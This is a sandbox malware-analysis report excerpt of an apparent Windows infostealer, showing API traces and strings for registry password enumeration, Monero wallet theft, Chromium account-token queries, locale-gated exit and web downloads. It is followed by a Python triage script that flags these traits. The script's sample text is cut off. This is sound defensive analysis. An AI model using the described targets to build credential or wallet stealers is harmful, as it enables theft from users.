                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: 487a9335989a81d59f42ded580947c71d66f16eccec0ba3326fcb45dd9185a9b
                        • Instruction ID: 6414a75891acce2eb2daf85b801abdd17bd2655a95d40993259b63ab80fc15cf
                        • Opcode Fuzzy Hash: 487a9335989a81d59f42ded580947c71d66f16eccec0ba3326fcb45dd9185a9b
                        • Instruction Fuzzy Hash: BC511F31910148ABCB18FF60DD9EAED7BB9AF10300F545068F4467B591EF346B85CB62
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 989c655f4f2cd38d34133d4a8c332ef7f702c9217aef11c0a29edc6a18074d5e
                        • Instruction ID: 79633d3ab95af133e20e9d0b9aeda3ccca91cc6bc16b6a1f911b42fbef464e0b
                        • Opcode Fuzzy Hash: 989c655f4f2cd38d34133d4a8c332ef7f702c9217aef11c0a29edc6a18074d5e
                        • Instruction Fuzzy Hash: 17C1B5B69002199BCB14EF60DC8DFEA77B8BB64304F1445E8F10AB7141DB75AA85CFA1
                        APIs
                          • Part of subcall function 00E38DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E38E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00E342EC
                        • lstrcat.KERNEL32(?,0196F1F8), ref: 00E3430B
                        • lstrcat.KERNEL32(?,?), ref: 00E3431F
                        • lstrcat.KERNEL32(?,0196DEF0), ref: 00E34333
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E38D90: GetFileAttributesA.KERNEL32(00000000,?,00E21B54,?,?,00E4564C,?,?,00E40E1F), ref: 00E38D9F
                          • Part of subcall function 00E29CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E29D39
                          • Part of subcall function 00E299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E299EC
                          • Part of subcall function 00E299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E29A11
                          • Part of subcall function 00E299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E29A31
                          • Part of subcall function 00E299C0: ReadFile.KERNEL32(000000FF,?,00000000,00E2148F,00000000), ref: 00E29A5A
                          • Part of subcall function 00E299C0: LocalFree.KERNEL32(00E2148F), ref: 00E29A90
                          • Part of subcall function 00E299C0: CloseHandle.KERNEL32(000000FF), ref: 00E29A9A
                          • Part of subcall function 00E393C0: GlobalAlloc.KERNEL32(00000000,00E343DD,00E343DD), ref: 00E393D3
                        • StrStrA.SHLWAPI(?,0196F2E8), ref: 00E343F3
                        • GlobalFree.KERNEL32(?), ref: 00E34512
                          • Part of subcall function 00E29AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E29AEF
                          • Part of subcall function 00E29AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E24EEE,00000000,?), ref: 00E29B01
                          • Part of subcall function 00E29AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E29B2A
                          • Part of subcall function 00E29AC0: LocalFree.KERNEL32(?,?,?,?,00E24EEE,00000000,?), ref: 00E29B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 00E344A3
                        • StrCmpCA.SHLWAPI(?,00E408D1), ref: 00E344C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E344D2
                        • lstrcat.KERNEL32(00000000,?), ref: 00E344E5
                        • lstrcat.KERNEL32(00000000,00E40FB8), ref: 00E344F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: 59c4d301f87111085b706c2675a6321e3614cd15b14f5e08173a269324f5697a
                        • Instruction ID: 63e78226775bcc3eab215a715773e1f05085c3a84c515c5b3ffaba159b233d99
                        • Opcode Fuzzy Hash: 59c4d301f87111085b706c2675a6321e3614cd15b14f5e08173a269324f5697a
                        • Instruction Fuzzy Hash: BB7148B6900218BBCB14FBA0DC89FEE77B9AF88300F045598F645B7185DA35EB45CB91
                        APIs
                          • Part of subcall function 00E212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E212B4
                          • Part of subcall function 00E212A0: RtlAllocateHeap.NTDLL(00000000), ref: 00E212BB
                          • Part of subcall function 00E212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E212D7
                          • Part of subcall function 00E212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E212F5
                          • Part of subcall function 00E212A0: RegCloseKey.ADVAPI32(?), ref: 00E212FF
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2134F
                        • lstrlen.KERNEL32(?), ref: 00E2135C
                        • lstrcat.KERNEL32(?,.keys), ref: 00E21377
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E38B60: GetSystemTime.KERNEL32(00E40E1A,0196E990,00E405AE,?,?,00E213F9,?,0000001A,00E40E1A,00000000,?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E38B86
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E21465
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E299EC
                          • Part of subcall function 00E299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E29A11
                          • Part of subcall function 00E299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E29A31
                          • Part of subcall function 00E299C0: ReadFile.KERNEL32(000000FF,?,00000000,00E2148F,00000000), ref: 00E29A5A
                          • Part of subcall function 00E299C0: LocalFree.KERNEL32(00E2148F), ref: 00E29A90
                          • Part of subcall function 00E299C0: CloseHandle.KERNEL32(000000FF), ref: 00E29A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 00E214EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 463109eb9f1ed82b177999000ce644a10146f47467c9b116d1b8bb998067fbdd
                        • Instruction ID: 709eb753a55e3a90a2d45b1b1ddee8c05e773f8f374d61653daa9ecd852089be
                        • Opcode Fuzzy Hash: 463109eb9f1ed82b177999000ce644a10146f47467c9b116d1b8bb998067fbdd
                        • Instruction Fuzzy Hash: 795175B2D5011897CB15FB60DC9AFED77BCAF54300F4451E8B24A72082EE346B89CBA5
                        APIs
                          • Part of subcall function 00E272D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E2733A
                          • Part of subcall function 00E272D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E273B1
                          • Part of subcall function 00E272D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E2740D
                          • Part of subcall function 00E272D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00E27452
                          • Part of subcall function 00E272D0: HeapFree.KERNEL32(00000000), ref: 00E27459
                        • lstrcat.KERNEL32(00000000,00E417FC), ref: 00E27606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E27648
                        • lstrcat.KERNEL32(00000000, : ), ref: 00E2765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E2768F
                        • lstrcat.KERNEL32(00000000,00E41804), ref: 00E276A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E276D3
                        • lstrcat.KERNEL32(00000000,00E41808), ref: 00E276ED
                        • task.LIBCPMTD ref: 00E276FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                        • String ID: :
                        • API String ID: 2677904052-3653984579
                        • Opcode ID: 7e96a68bfdb1d009938b77c803abe47c1b0c970aa2ab01baa1fb731e8fc50f5b
                        • Instruction ID: 3e14d21b22992c58781a98256db6c18f1a9a03909db4b9db257fb5f6d13b7c86
                        • Opcode Fuzzy Hash: 7e96a68bfdb1d009938b77c803abe47c1b0c970aa2ab01baa1fb731e8fc50f5b
                        • Instruction Fuzzy Hash: BD313E72A01109DFCB18FBA4ED99DFE77B4BB48301B206118F142B72A5DA39A946CB51
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0196F7B0,00000000,?,00E40E2C,00000000,?,00000000), ref: 00E38130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E38137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00E38158
                        • __aulldiv.LIBCMT ref: 00E38172
                        • __aulldiv.LIBCMT ref: 00E38180
                        • wsprintfA.USER32 ref: 00E381AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: 83042ee46a4f407742f14478c4517ff824e3a9cad3a04dd6ad551acdd085153d
                        • Instruction ID: e21e54162f19995b45a6ff125db45cc1c8f03e864afe0cdee8716e0c00036409
                        • Opcode Fuzzy Hash: 83042ee46a4f407742f14478c4517ff824e3a9cad3a04dd6ad551acdd085153d
                        • Instruction Fuzzy Hash: AF21F7B1E44318ABDB10DFD4DD49FAEBBB8EB44B10F104619F605BB280D7796901CBA5
                        APIs
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E24839
                          • Part of subcall function 00E247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E24849
                        • InternetOpenA.WININET(00E40DF7,00000001,00000000,00000000,00000000), ref: 00E2610F
                        • StrCmpCA.SHLWAPI(?,0196FA58), ref: 00E26147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E2618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E261B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00E261DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E2620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00E26249
                        • InternetCloseHandle.WININET(?), ref: 00E26253
                        • InternetCloseHandle.WININET(00000000), ref: 00E26260
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: 6480ddb0dba904231dfbd399a9bd6f8a283945fb4ba77c7fcbd35d779400da8e
                        • Instruction ID: eb4f02679eccaa758f8c811b2348346042ac50b7e007e2cf6de9b06cd648a268
                        • Opcode Fuzzy Hash: 6480ddb0dba904231dfbd399a9bd6f8a283945fb4ba77c7fcbd35d779400da8e
                        • Instruction Fuzzy Hash: 4C517EB1A00218EBDB20DF50EC49BEE77B8FB44305F1091A8F646B7190DB796A85CF95
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E2733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E273B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E2740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00E27452
                        • HeapFree.KERNEL32(00000000), ref: 00E27459
                        • task.LIBCPMTD ref: 00E27555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuetask
                        • String ID: Password
                        • API String ID: 775622407-3434357891
                        • Opcode ID: cc8d40b1d6d43edcddba5faaa64fe4510b8cb8d2ac8698409d49da40b86557e9
                        • Instruction ID: c95b310eb21225770dc142d33a183c3f86b0a2479d6bc71a88b8e2732d8b8a3c
                        • Opcode Fuzzy Hash: cc8d40b1d6d43edcddba5faaa64fe4510b8cb8d2ac8698409d49da40b86557e9
                        • Instruction Fuzzy Hash: DB613AB590426C9BDB24DB50ED45FDAB7B8BF44304F0091E9E689B6141DBB06BC9CFA0
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                        • lstrlen.KERNEL32(00000000), ref: 00E2BC9F
                          • Part of subcall function 00E38E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E38E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 00E2BCCD
                        • lstrlen.KERNEL32(00000000), ref: 00E2BDA5
                        • lstrlen.KERNEL32(00000000), ref: 00E2BDB9
                        Strings
                        Memory Dump Source: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_e20000_file.jbxd as listed for the first function record above)
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: 0ead5b5e3cad6147913034a2f70c15e5e6f27e0e2a83ae021f66354c9b4e3c86
                        • Instruction ID: 93cbea0ba7ab0bc6045233488a53c514f27eaf3dc737599f456a5f2f9c831026
                        • Opcode Fuzzy Hash: 0ead5b5e3cad6147913034a2f70c15e5e6f27e0e2a83ae021f66354c9b4e3c86
                        • Instruction Fuzzy Hash: BCB13572910108ABDF18FBA0DD5AEEE77B8AF54300F445168F546B3091EF346E89CB62
                        APIs
                        Strings
                        Memory Dump Source: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_e20000_file.jbxd as listed for the first function record above)
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: b3637c3c3f8aac6c573ba226f03fb73d1d2324de4932ff40ed4f5c60b0111ca8
                        • Instruction ID: 57713901a65994fe8a648f7e7c0fa8cb294bec78f159bda68e42e95f0bb0ae7f
                        • Opcode Fuzzy Hash: b3637c3c3f8aac6c573ba226f03fb73d1d2324de4932ff40ed4f5c60b0111ca8
                        • Instruction Fuzzy Hash: 67F05E30A04209EFD354AFE0E90D72C7BB0FB04707F044199E64AA7294D67E4B41DB95
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E24FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E24FD1
                        • InternetOpenA.WININET(00E40DDF,00000000,00000000,00000000,00000000), ref: 00E24FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E25011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E25041
                        • InternetCloseHandle.WININET(?), ref: 00E250B9
                        • InternetCloseHandle.WININET(?), ref: 00E250C6
                        Memory Dump Source: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_e20000_file.jbxd as listed for the first function record above)
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: 8f54e1fcd4a6f20883f74456b82fabad61b6b57a4553e38ece80fb7d5ab60ccb
                        • Instruction ID: 6fdcf89ff015bc98db8d98a238a7d3d6e375905917bc93966f8fb593d63792e7
                        • Opcode Fuzzy Hash: 8f54e1fcd4a6f20883f74456b82fabad61b6b57a4553e38ece80fb7d5ab60ccb
                        • Instruction Fuzzy Hash: 1E3106B5A00218EBDB20DF54DD85BDCB7B4FB48704F1081D9EA0AB7281C7746AC58F98
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E38426
                        • wsprintfA.USER32 ref: 00E38459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E3847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 00E3848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00E38499
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                        • RegQueryValueExA.ADVAPI32(00000000,0196F6F0,00000000,000F003F,?,00000400), ref: 00E384EC
                        • lstrlen.KERNEL32(?), ref: 00E38501
                        • RegQueryValueExA.ADVAPI32(00000000,0196F738,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E40B34), ref: 00E38599
                        • RegCloseKey.ADVAPI32(00000000), ref: 00E38608
                        • RegCloseKey.ADVAPI32(00000000), ref: 00E3861A
                        Strings
                        Memory Dump Source: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_e20000_file.jbxd as listed for the first function record above)
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 2fc94e1414952b7527a9be5169659b70e9cf53fb6953db9cbbad1f9b66422a0d
                        • Instruction ID: 50c03d7c344cb35a73dd37e0fd0c42e934350e696546d5239691e483e0e13875
                        • Opcode Fuzzy Hash: 2fc94e1414952b7527a9be5169659b70e9cf53fb6953db9cbbad1f9b66422a0d
                        • Instruction Fuzzy Hash: 5721F6B1A10218AFDB24DB54DC85FE9B7B8FB48704F0081D8E649A6140DF75AA85CFE4
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E376A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E376AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0195BBE8,00000000,00020119,00000000), ref: 00E376DD
                        • RegQueryValueExA.ADVAPI32(00000000,0196F648,00000000,00000000,?,000000FF), ref: 00E376FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 00E37708
                        Strings
                        Memory Dump Source: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_e20000_file.jbxd as listed for the first function record above)
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: 801e7225e3d42c67d8057dfe26b548a92b04d07e11b56dada58f7fcf38a5cc1d
                        • Instruction ID: 331e7e9f0185e07cb57abd50bd3a9f63a05cf65a34117454784fe30975b7efa2
                        • Opcode Fuzzy Hash: 801e7225e3d42c67d8057dfe26b548a92b04d07e11b56dada58f7fcf38a5cc1d
                        • Instruction Fuzzy Hash: DD0144B5B04204FFD720EBE4DD4DF6A77B8EB44701F104055FA85B7295D6799900CB50
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E37734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E3773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0195BBE8,00000000,00020119,00E376B9), ref: 00E3775B
                        • RegQueryValueExA.ADVAPI32(00E376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00E3777A
                        • RegCloseKey.ADVAPI32(00E376B9), ref: 00E37784
                        Strings
                        Memory Dump Source: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_e20000_file.jbxd as listed for the first function record above)
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: d24911f309100f7ab4173d26ac912b012044db2b8779c40ade73735cebe9f65e
                        • Instruction ID: 39dd78d718e661befc5b7c3127fc48f71489415c650a6d429bd53fa02fdf6485
                        • Opcode Fuzzy Hash: d24911f309100f7ab4173d26ac912b012044db2b8779c40ade73735cebe9f65e
                        • Instruction Fuzzy Hash: 3C0144B5A40308FFD710EBE0DC4AFAEB7B8EB44701F004155FA45B7285D6756600CB50
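                        The function records above are the raw material for a function-level triage, and their line shapes are regular enough to parse. The following Python script is an added example, not part of the Joe Sandbox report: it reads records in this format (the "APIs" bullets of the form `Name.MODULE(args), ref: addr`, the "Part of subcall function" prefix, and the "API ID", "String ID" and "Opcode ID" fields) and flags the stealer tells visible in them: the WinINet download chain, the `SELECT service, encrypted_token FROM token_service` query (my reading: the token_service table of Chromium's Web Data database, which holds the signed-in Google account's DPAPI-protected refresh tokens; the report only shows the query string), the `\Monero\wallet.keys` path, the DefaultLangUser plus ExitProcess pairing (GetUserDefaultLangID followed by ExitProcess, the chain behind the "may stop execution after checking locale" signature), the CurrentBuildNumber read used for OS fingerprinting, and the `%s\%s` RegEnumKeyExA walk. Using "API ID" as well as the call list matters because some records, such as the ExitProcess/DefaultLangUser one, carry no resolved calls at all. The rule names, the Opcode-ID keying and the embedded SAMPLE (a trimmed excerpt of the records above) are my choices, not anything the report defines.

```python
"""Parse the per-function records of a Joe Sandbox report (the "APIs" and
"Similarity" blocks) and flag the infostealer tells they expose.
Added example; SAMPLE is a trimmed excerpt of records shown on this page."""
import re
from dataclasses import dataclass, field
from typing import NamedTuple, Optional


class ApiCall(NamedTuple):
    name: str                  # e.g. "InternetReadFile"
    module: str                # e.g. "WININET"
    args: tuple                # argument values exactly as the report printed them
    ref: str                   # call-site address
    subcall_of: Optional[str]  # set for "Part of subcall function XXXX:" lines


@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)
    api_id: str = ""        # "$"-joined API stems; present even when the call list is empty
    string_id: str = ""     # "$"-joined string references
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""


BULLET = r"^(?:•\s*)?"
API_RE = re.compile(BULLET + r"(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
                    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
# "API String ID" deliberately does not match: it is a hash pair, not a field used here.
KEY_RE = re.compile(BULLET + r"(API ID|String ID|Opcode ID|Instruction Fuzzy Hash):\s*(.*)$")


def parse_report(text: str) -> list:
    """Split the report into FuncRecords; each record opens with a bare "APIs" header."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FuncRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(a.strip() for a in (m["args"] or "").split(",") if a.strip())
            cur.calls.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
            continue
        m = KEY_RE.match(line)
        if m:
            setattr(cur, m.group(1).lower().replace(" ", "_"), m.group(2).strip())
    return records


def _names(rec):
    return {c.name for c in rec.calls}


def _text(rec):
    """Every argument literal plus the String ID, for substring tells."""
    return " ".join(a for c in rec.calls for a in c.args) + " " + rec.string_id


# Rule names are mine; each predicate encodes one tell visible in the records above.
RULES = {
    "wininet_download": lambda r: {"InternetOpenUrlA", "InternetReadFile"} <= _names(r),
    "chromium_token_service_query": lambda r: "FROM token_service" in r.string_id,
    "crypto_wallet_path": lambda r: "wallet" in _text(r).lower(),
    "locale_gated_exit": lambda r: "DefaultLang" in r.api_id and "ExitProcess" in r.api_id,
    "os_build_fingerprint": lambda r: "CurrentBuildNumber" in _text(r) and "RegQueryValueExA" in _names(r),
    "registry_key_walk": lambda r: "RegEnumKeyExA" in _names(r) and r.string_id == r"%s\%s",
}


def classify(records) -> dict:
    """Map the first 16 hex digits of each record's Opcode ID to the rules it triggers."""
    hits = {}
    for rec in records:
        matched = [name for name, pred in RULES.items() if pred(rec)]
        if matched:
            hits[rec.opcode_id[:16]] = matched
    return hits


def capabilities(records) -> list:
    """Distinct tells seen anywhere in the report, sorted."""
    return sorted({name for rules in classify(records).values() for name in rules})


SAMPLE = r"""
APIs
  • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00E2BCCD
Similarity
  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
  • API String ID: 3073930149-1079375795
  • Opcode ID: 0ead5b5e3cad6147913034a2f70c15e5e6f27e0e2a83ae021f66354c9b4e3c86
APIs
  • API ID: ExitProcess$DefaultLangUser
  • String ID: *
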